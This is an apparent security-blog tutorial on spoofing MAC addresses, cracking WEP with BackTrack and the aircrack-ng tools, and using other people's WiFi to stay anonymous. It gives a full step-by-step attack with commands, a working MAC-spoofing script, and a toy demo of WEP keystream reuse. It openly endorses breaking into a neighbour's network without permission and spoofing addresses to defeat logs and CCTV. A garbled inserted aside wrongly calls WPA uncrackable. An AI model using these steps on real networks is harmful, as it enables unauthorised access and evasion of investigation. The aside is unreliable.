WIFI, Backtrack and MAC Spoofing

Posted by Hardcore

MAC Spoofing
What software you use for this depends on your operating system.

Ubuntu

sudo apt-get install macchanger
The interface must be down while its address is changed (ifconfig wlan0 down, or ip link set wlan0 down; bring it back up afterwards). The command has the form: macchanger [options] device
The options you will actually use are -s (show the current and permanent address), -r (set a fully random address), -m xx:xx:xx:xx:xx:xx (set a specific address) and -p (restore the permanent, burned-in address). The full list is in macchanger --help.

Windows
Windows has a variety of programs for changing the MAC address, some free and some not. One I found is called Technitium (Technitium MAC Address Changer) and it appears to be free. I cannot make any endorsement of this software product, but it appears to be legitimate and to work fine, and it has an easy to use GUI. One caveat that applies to every such tool on Windows: the change is made through the driver's NetworkAddress setting, and many wireless drivers only accept an address whose first octet has the locally administered bit set (second hex digit 2, 6, A or E), so pick or generate addresses of that form if a change silently fails.

Macintosh
There seem to be a wide variety of ways to spoof the MAC on Macintosh computers (I am far from an expert with Macintosh, having used one only once, for the purpose of writing the Mac part of these tutorials), some of them working on some systems and not others, so I am going to have a hard time explaining how to do this with a Macintosh.
For some, this works:
From a terminal type in the following: sudo airport -m [new mac]
The more commonly documented method on OS X is to disassociate from any network and then set the address on the wireless interface directly (en1 on most MacBooks of that era, en0 on others; check ifconfig):
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z
sudo ifconfig en1 ether 02:xx:xx:xx:xx:xx
If neither technique works for you, I suggest you research the matter on your own and try to figure out a solution. I am sure there is some way to do it with a Mac, but the problem seems to be that there are many ways to do it and it is different for different operating system versions and architectures. If you find a way to do it, send me the details and I will add it here.
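The following is an added example, not code from the original post or from macchanger. It does in Python what the macchanger step above does by hand: generate a fresh random MAC address (locally administered bit set, multicast bit clear), check an address before using it, and apply it with iproute2's ip link. It assumes Linux with the ip tool available and root privileges; the interface name wlan0 and the sample addresses are assumptions for illustration.

```python
"""Generate, validate and apply a spoofed MAC address on Linux.

Added example (not from the original tutorial). Assumes iproute2's `ip`
is installed and the script runs as root; "wlan0" is only a default.
"""
import os
import re
import subprocess
import sys

_MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$", re.IGNORECASE)


def random_mac() -> str:
    """Random unicast, locally administered MAC.

    First octet: bit 0 (I/G) cleared so it is a valid *source* address,
    bit 1 (U/L) set so it cannot collide with an IEEE-assigned OUI.
    """
    octets = bytearray(os.urandom(6))
    octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{b:02x}" for b in octets)


def mac_flags(mac: str) -> dict:
    """Decode the two flag bits of the first octet; raises on malformed input."""
    if not _MAC_RE.match(mac):
        raise ValueError(f"not a colon-separated MAC: {mac!r}")
    first = int(mac.split(":")[0], 16)
    return {
        "multicast": bool(first & 0x01),             # never valid as a source MAC
        "locally_administered": bool(first & 0x02),  # set => not a vendor-assigned address
    }


def spoof_commands(iface: str, mac: str) -> list:
    """The `ip` invocations equivalent to `macchanger -m MAC IFACE`.

    The link has to be down while the address changes, hence three steps.
    """
    if mac_flags(mac)["multicast"]:
        raise ValueError(f"{mac}: multicast bit set, the kernel rejects it as a source address")
    return [
        ["ip", "link", "set", "dev", iface, "down"],
        ["ip", "link", "set", "dev", iface, "address", mac],
        ["ip", "link", "set", "dev", iface, "up"],
    ]


def spoof(iface: str, mac: str = None) -> str:
    """Apply `mac` (or a fresh random one) to `iface`; returns the address used."""
    mac = mac or random_mac()
    for cmd in spoof_commands(iface, mac):
        subprocess.run(cmd, check=True)
    return mac


if __name__ == "__main__":
    # Usage: sudo python3 spoof.py [iface] [mac]
    iface = sys.argv[1] if len(sys.argv) > 1 else "wlan0"
    print(spoof(iface, sys.argv[2] if len(sys.argv) > 2 else None))
```

Setting the locally administered bit is what keeps a made-up address from colliding with a real vendor prefix, and it is also the form many Windows wireless drivers insist on. The trade-off is that such an address is recognisable as not vendor-assigned; if blending in with ordinary clients matters more, macchanger -a (random address keeping a real vendor OUI of the same kind) is the alternative.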

WEP Cracking
For cracking WEP we are going to use a special tool called BackTrack. BackTrack is a Linux live distribution built for penetration testing that ships Kismet and the aircrack-ng suite preinstalled (it has since been superseded by Kali Linux, which carries the same tools), so find a copy, burn it to a disc and boot from it. If you can get your WiFi card passed through to a virtual machine properly, you can do this from a VM as well.
When BackTrack boots it asks for a username and password: the username is root and the password is toor (that is the default on every BackTrack release; "admin" is not a valid login). Since you will want the desktop GUI, type startx after logging in. Once you are at the desktop, open a terminal and we can get started.

1. Type kismet in a terminal. If it asks for your wireless interface, point it at it (iwconfig lists the available wireless interfaces). Kismet puts the card into monitor mode; if you would rather not run Kismet, airmon-ng start [wireless device] does the same and creates a monitor interface (mon0 on BackTrack) to use in the steps below.

2. In Kismet, press s and then Q (it is case sensitive). This takes Kismet out of autofit mode and lets you move around the list of access points and their details.

3. Look for access points with "Y" in the encryption column. These are WEP networks, the ones this procedure can crack. ("N" means open: you can probably just connect. "O" means some other encryption, almost always WPA, which this procedure does not break.)

4. Select the WEP access point you want and write down its ESSID, BSSID and channel. Leave Kismet running even though you are done with it, so the card stays in monitor mode.

5. Open a new terminal and start airodump-ng, locked to the target's channel and BSSID and writing captured frames to a file prefix you will need later:
airodump-ng -c [channel from step 4] --bssid [bssid from step 4] -w [output file prefix] [wireless device]
Replace the bracketed parts with the real values and drop the brackets themselves. airodump-ng writes [output file prefix]-01.cap; the #Data column for the target is the number of unique IVs collected so far.

6. Open a new terminal and fake-authenticate to the access point so that it will accept frames from you:
aireplay-ng -1 0 -e [essid from step 4] -a [bssid from step 4] -h [your MAC address] [wireless device]
The -h value must be the address the card is actually using right now (macchanger -s [wireless device] shows it), otherwise the access point ignores you. Brackets as before.

7. Now run the ARP replay attack to make the access point generate traffic quickly:
aireplay-ng -3 -b [bssid from step 4] -h [your MAC address] [wireless device]
Wait until aireplay-ng reports that it has read an ARP request; it then replays that request over and over, and each time the access point rebroadcasts it with a fresh IV, so the #Data count in airodump-ng should climb fast. The more IVs you collect, the better your chance of recovering the key. With the PTW attack that current aircrack-ng uses by default, 64-bit WEP usually falls with around 20,000 IVs and 128-bit with 40,000 to 85,000; the several hundred thousand quoted below was the requirement of the older statistical attacks.

8. When you have collected enough IVs, open a new terminal and run aircrack-ng against the capture from step 5:
aircrack-ng -b [bssid from step 4] [output file prefix]-01.cap
After a little while aircrack-ng will either print the key or tell you it failed, in which case leave airodump-ng and aireplay-ng running, gather more IVs and try again; aircrack-ng reads the capture file as it grows, so you can simply rerun it. The original advice was to make a first attempt at around four hundred thousand IVs; with PTW it is worth trying far earlier, and it is entirely possible it works with much less.

How It Works

WiFi Principles
WiFi is wireless networking (802.11): your network card and antenna talk over radio to an access point, usually a router or a modem, which passes you on to the internet. It exists so that you can get online from anywhere in range, typically on a laptop, instead of being tied to a phone jack or a cable; one wired connection with the right equipment can serve a wide area.

In the context of anonymity, WiFi lets you reach the internet through a connection that has no real tie to you. Many access points are unsecured (open WiFi) and many more are secured with easily cracked encryption (WEP). By going to random locations and using open WiFi, you interact with the internet without a direct link back to you.

This can be used alone, or together with an anonymity network such as Tor, which still rides on a connection that can be tied to you but makes following that connection back to you very difficult.

There are a few things to keep in mind when using WiFi. The first is that it is not perfect anonymity; there are several ways a WiFi session can be traced back to you, some more serious than others. Your computer's network card has an individual MAC address, and when you connect to a hotspot, the hotspot sees it (it is sent in the clear in every frame). There is no registry tying MAC addresses to people (the vendor half of the address, the OUI, only identifies the manufacturer), so a logged MAC on its own does not give away your identity. But if your computer is ever seized and the MAC address of its network card read off it (trivial with physical access), the hotspot's logs become strong circumstantial evidence that a connection came from your machine. This threat is easy to avoid: spoof your MAC, that is, tell your computer to present an address of your choosing rather than the real one.

An adversary with access to the logs of several hotspots can also build a profile of you over time. Say you always use WiFi at a particular coffee shop, and the chain agrees to cooperate with your adversary. They log your MAC address at different branches and keep the CCTV footage; put the two together and, by elimination, they have your image, and possibly your vehicle and its license plate if you drove there. That is very strong evidence against you. So spoof a new MAC address every single time you connect, to break that linkage, and use Tor or similar on top of the WiFi so that even the initial trace back to the coffee shop is expensive and slow for the adversary.

Another thing to keep in mind is that a WiFi signal can be physically located. Once you are connected, someone with wireless analyzers and directional antennas can home in on you, narrowing your position from the signal strength and bearing measured at several points (trilateration). So WiFi is not an absolute disconnect between you and the hotspot. If you always use the same hotspot you can eventually be found, so always using your neighbor's WiFi may not be a good idea (it is likely better than nothing, but not as good as a new hotspot each time). I know people who have gotten unfriendly visits from folks who had been able to determine they were using their neighbor's WiFi to access the internet (although the visit was not over that), so it is a possibility. Generally, the further you are from the access point, the longer it takes for someone to find you.

Also keep in mind that on an open (unsecured) WiFi connection, everything you send that is not otherwise encrypted can be read both by anyone nearby with a wireless card in monitor mode and by whoever owns the hotspot. WEP is little better: it is easy to crack, and because everyone shares one key, anyone who has it can decrypt everyone else's traffic. Even with WPA (if you could crack it), the owner of the access point sees what you say and who you say it to. Even if you encrypt end to end with SSL, the access point owner still sees who you are talking to (DNS lookups and destination addresses, though not the content). For this reason it is VERY important to use Tor, or at the very least some kind of encrypted proxy, whenever you are on WiFi. Then the access point owner can see neither what you say (it is encrypted) nor who you are talking to (only that you are talking to the Tor network, or to your proxy).

As far as the actual equipment involved (from your perspective) in using WiFi for anonymity, you need to choose an antenna and a network card. There are two types of antenna, directional and omnidirectional ("omni").


The two images above (not reproduced in this copy) show the two primary antenna types (the first directional, the second omni). There are also flat panel antennas (usually omni) that look like squares and stick on the back of a laptop. Directional antennas pick up signals from further away than omnis of similar price, but only within a narrow beam. They are ideal if you have a place to set up (hotel room, house, park bench) because of the range and the control over the beam, but they are not discreet and are poor for war driving. Omni antennas do not reach as far in any one direction, but receive from all 360 degrees; they are more discreet and are probably what you want.

You will also need a network card to attach the antenna to. Laptop and desktop cards look different. Here is an image of a standard laptop network card with an omni antenna attached.

Make sure your network card is supported by the aircrack-ng suite; there is a list of compatible cards on its website. What matters is that the driver supports monitor mode and packet injection. If your card is not supported you will find it nearly impossible to crack WiFi with it, but you can still use open and public connections.

WEP and WPA
Although many WiFi networks are open (anyone can join), some are protected with encryption. The two most common schemes are WEP and WPA. Fortunately for those who use WiFi for anonymity, WEP is very easy to crack. This is due to a fundamental flaw in its design: RC4 is re-seeded for every frame with a 24-bit IV that is sent in the clear, so keystreams repeat, known plaintext reveals keystream, and RC4's key-scheduling weaknesses leak the key once enough IV and keystream pairs have been collected. Many people use WEP. WPA is harder to crack (FALSE: WPA can't be cracked. Just use a randomly generated 63-character passphrase (upper and lower case, numbers, symbols, spaces) and no computer can get the password in less than 99999999999999999999999999999999999999999999999 billion years. If you put in things which can be guessed then you have no security, but if you have my type of password NOBODY can crack it.) and often you will have no luck even trying. The attacks that exist against WPA-PSK are offline dictionary and brute-force attacks against a captured four-way handshake, so they succeed only when the passphrase is guessable; with a strong passphrase you will not break it, although it never hurts to try. Also, some access points restrict access by MAC address, but since the permitted addresses appear in the clear in every frame they send, this is trivially bypassed with spoofing.
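The following is an added example, not code from the original tutorial or from the aircrack-ng project. It is a toy model of the weakness just described and of why step 7 of the procedure above replays ARP requests: the first 16 bytes of every ARP request are fixed, so each captured ARP frame hands the attacker 16 bytes of keystream for its IV, and any later frame that reuses the IV (only 2^24 exist) is partly readable without the key. It assumes RC4 seeded with IV || key as in WEP, a constructed 40-bit key, constructed sample frames, and omits the CRC-32 ICV real WEP appends, since the keystream-reuse point does not depend on it.

```python
"""Toy WEP keystream reuse (added example; not from the tutorial or aircrack-ng).

Assumes RC4 keyed with IV || 40-bit key as in WEP, a constructed key and
constructed frames. The CRC-32 ICV of real WEP is left out.
"""
import math

# LLC/SNAP header + fixed ARP-request fields (hardware/protocol type, lengths,
# opcode). Identical in every ARP request, hence a known-plaintext source.
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")
IV_LEN = 3  # WEP IVs are 24 bits and travel in the clear


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling + generator) producing `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; zip() truncates to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4_{IV||key}(plaintext). The IV is not secret."""
    assert len(iv) == IV_LEN
    return iv + xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> tuple:
    """Recover (iv, keystream prefix) from a frame whose leading bytes are known."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    return iv, xor_bytes(body[:len(known)], known)


def decrypt_with_table(frame: bytes, table: dict):
    """Decrypt as much of `frame` as the stored keystream for its IV covers; None if IV unseen."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    ks = table.get(iv)
    return None if ks is None else xor_bytes(body, ks)


def expected_frames_until_iv_repeat(iv_bits: int = 24) -> int:
    """Birthday bound: about sqrt(pi/2 * 2^n) frames before some IV is reused."""
    return round(math.sqrt(math.pi / 2 * 2 ** iv_bits))


def demo() -> bytes:
    """Read the start of an unrelated frame that reuses a seen IV, without the key."""
    key = bytes.fromhex("0123456789")  # constructed 40-bit WEP key; attacker never learns it
    iv = bytes.fromhex("a1b2c3")
    # 1. Attacker captures an encrypted ARP request (rest of frame is filler).
    arp_frame = wep_encrypt(key, iv, ARP_REQUEST_PREFIX + bytes(12))
    # 2. Known plaintext XOR ciphertext = 16 bytes of keystream for this IV.
    seen_iv, ks = keystream_from_known_plaintext(arp_frame, ARP_REQUEST_PREFIX)
    table = {seen_iv: ks}
    # 3. A later frame under the same IV is readable for those 16 bytes.
    later_frame = wep_encrypt(key, iv, b"GET /login HTTP/")
    return decrypt_with_table(later_frame, table)


if __name__ == "__main__":
    print(demo())
    print(expected_frames_until_iv_repeat())
```

Real attacks do not wait for the birthday bound: the ARP replay in step 7 makes the access point re-encrypt the same known 16 bytes under thousands of fresh IVs per minute, and it is that stream of (IV, keystream) pairs, not IV collisions, that aircrack-ng feeds into the PTW key-recovery attack. The table-based decryption here is just the simplest way to show that a reused 24-bit IV already breaks confidentiality on its own.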

Overall Opinion
It is my opinion that WiFi definitely has its advantages and disadvantages, and whether you should use it or not depends on how you plan to use it as well as your situation. If you are planning on using WiFi from the area you live in, you should aim to use open WiFi over encrypted WiFi, simply because it is in fact a crime to even crack WiFi without permission from the owner. You will likely not get in trouble for it either way though. But using open WiFi will allow you to blend in with others who are using it, and will not seem inherently suspicious in itself (lots of people use open WiFi around their area). I do think that using open WiFi and Tor from your area of living is superior to using simply Tor. I don't think it is greatly superior though. If you are going to crack WEP from your home, it is more questionable whether the advantages outweigh the disadvantages. Perhaps Tor will have its anonymity compromised, and instead of finding you the attacker finds your neighbor. Or perhaps your neighbor notices you are using their WiFi and gets the police with WiFi analyzers to track you down and ask you to stop (even if it isn't related to what you are actually using their WiFi for). Even if Tor's anonymity is breached, it would be trivial to trace a WiFi signal back from your neighbor's to you, so it isn't even a sure thing that this will keep you safe. And as I said before, I do know someone who had an unfriendly visit, and they did in fact know he had been using his neighbor's WiFi. I still think in general you will likely be slightly safer cracking your neighbor's WEP than using your own internet, but the final choice is up to you. I do certainly think you are better off using open WiFi if at all possible though.

If you are able to travel to different locations every time you access the internet, or do so from more public places (such as areas that offer free public WiFi), you will in my opinion be greatly increasing your anonymity (although you should still use Tor as well). Be it cracking WEP using a tripod directional antenna in a hotel room, or simply using an omni antenna to crack WEP (or access an unsecured connection) from a random park bench, you will make yourself harder to track down. I suggest that people who do highly sensitive operations (likely to attract scrutiny) combine Tor with random WiFi access points. I also think that if you are doing a single sensitive operation (such as setting up a server, or sending a single e-mail to an unknown) you are definitely better off temporarily using your neighbor's WEP connection than using your own internet connection. So in general using open or cracked WiFi gets my endorsement, but please do understand its limitations.

Copyright Black OP Security.